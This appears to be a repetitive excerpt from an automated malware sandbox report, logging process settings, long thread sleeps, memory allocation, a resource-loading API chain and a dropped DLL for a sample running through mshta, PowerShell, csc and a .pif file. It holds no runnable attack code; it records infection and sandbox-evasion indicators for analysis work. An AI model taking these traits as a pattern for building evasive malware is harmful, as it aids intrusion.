                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: 28F90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: 293B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifMemory allocated: 29160000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifCode function: 11_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,11_2_004019F0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599438Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599219Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598671Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 598078Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597956Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597828Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597718Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597577Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597433Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 597039Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596880Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596531Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596421Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596312Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 596094Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595969Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595859Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595750Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595641Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595531Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595422Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595313Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595188Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594967Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594858Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594749Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594482Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594364Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 594080Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 593953Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifThread delayed: delay time: 593837Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 9987Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7723Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1926Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifWindow / User API: threadDelayed 7584Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifWindow / User API: threadDelayed 2248Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifWindow / User API: foregroundWindowGot 1772Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\mshta.exe TID: 6972Thread sleep count: 9987 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1488Thread sleep count: 7723 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1076Thread sleep count: 1926 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5244Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep count: 39 > 30Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 3676Thread sleep count: 7584 > 30Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 3676Thread sleep count: 2248 > 30Jump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599438s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599327s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599219s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598999s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598891s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598671s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598438s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598313s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598188s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -598078s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -597956s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -597828s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -597718s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -597577s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -597433s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -597039s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596880s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596750s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596641s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596531s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596421s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596312s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596203s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -596094s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595969s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595859s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595750s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595641s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595531s >= -30000sJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pif TID: 4296Thread sleep time: -595422s >= -30000sJump to behavior
